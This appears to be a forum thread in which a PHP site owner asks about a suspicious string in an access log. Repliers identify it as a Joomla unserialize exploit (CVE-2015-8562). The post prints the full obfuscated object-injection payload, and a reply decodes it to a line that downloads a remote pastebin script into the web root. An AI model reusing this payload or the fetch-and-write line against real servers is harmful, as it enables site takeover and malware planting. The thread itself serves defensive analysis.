Some time ago I developed a website written in pure PHP, without a database. Users and content are managed by directories from an administrative part. I endowed it with a lot of security so that the contents cannot be accessed externally and passwords can be easily broken.
The issue is that in the part where I see the IP of daily connections that are recorded in a text file, I find the following:
}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:979:"eval(chr(102).chr(119).chr(114).chr(105).chr(116).chr(101).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(36).chr(95).chr(83).chr(69).chr(82).chr(86).chr(69).chr(82).chr(91).chr(39).chr(68).chr(79).chr(67).chr(85).chr(77).chr(69).chr(78).chr(84).chr(95).chr(82).chr(79).chr(79).chr(84).chr(39).chr(93).chr(46).chr(39).chr(47).chr(114).chr(120).chr(114).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(43).chr(39).chr(41).chr(44).chr(102).chr(105).chr(108).chr(101).chr(95).chr(103).chr(101).chr(116).chr(95).chr(99).chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(115).chr(40).chr(39).chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(112).chr(97).chr(115).chr(116).chr(101).chr(98).chr(105).chr(110).chr(46).chr(99).chr(111).chr(109).chr(47).chr(114).chr(97).chr(119).chr(47).chr(75).chr(102).chr(104).chr(66).chr(114).chr(106).chr(82).chr(98).chr(39).chr(41).chr(41).chr(59));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}
This sounds to me like a possible code injection attempt... without any success! Can someone identify it and explain to me what it is? Thanks in advance!!!.
If you convert the "chr" you get the string:
fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/rxr1php','w+'),file_get_contents('https://pastebin.com/raw/KfhBrjRb'));
The script in question is as follows:
It allows to obtain server information (Type of operating system, computer name, version of the operating system, processor architecture and the base path of the web server):
And apparently they use it to carry out attacks depending on the type of machine you have:
Update:
I think this is an attempt to exploit the CVE-2015-8562 vulnerability: https://blog.cloudflare.com/the-joomla-unserialize-vulnerability/
If it is a cross site scripting type code injection, it is just doing the data collection, sanitize your inputs well and check with nmap that you do not have the ports open that you should not. https://php.net/manual/en/filter.filters.sanitize.php